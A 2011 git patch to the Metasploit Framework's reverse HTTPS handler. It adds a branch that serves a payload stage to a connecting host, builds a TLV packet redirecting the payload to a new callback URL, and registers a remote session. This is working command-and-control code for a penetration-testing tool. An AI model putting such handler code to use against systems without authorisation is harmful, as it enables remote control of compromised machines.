From c0ddf56ec038ee8d69d1f7950fb7e44d6b9dbddd Mon Sep 17 00:00:00 2001
From: James Lee
Date: Fri, 16 Sep 2011 21:31:21 +0000
Subject: [PATCH] hmf, missed this one, too. see #5288
git-svn-id: file:///home/svn/framework3/trunk@13743 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/handler/reverse_https.rb | 30 +++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index 1b747d729a..605eb759d5 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -126,6 +126,36 @@ protected
 # Process the requested resource.
 case req.relative_resource
+ when /^\/INITJM/
+ conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+ url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ #$stdout.puts "URL: #{url.inspect}"
+
+ blob = ""
+ blob << obj.generate_stage
+
+ # This is a TLV packet - I guess somewhere there should be API for building them
+ # in Metasploit :-)
+ packet = ""
+ packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"
+ packet << [url.length+8, 0x1000a].pack('NN')+url
+ packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN')
+ packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN')
+ blob << [packet.length+8, 0].pack('NN') + packet
+
+ resp.body = blob
+ conn_ids << conn_id
+
+ # Short-circuit the payload's handle_connection processing for create_session
+ create_session(cli, {
+ :passive_dispatcher => obj.service,
+ :conn_id => conn_id,
+ :url => url,
+ :expiration => datastore['SessionExpirationTimeout'].to_i,
+ :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
+ :ssl => false
+ })
+
 when /^\/A?INITM?/
 url = ''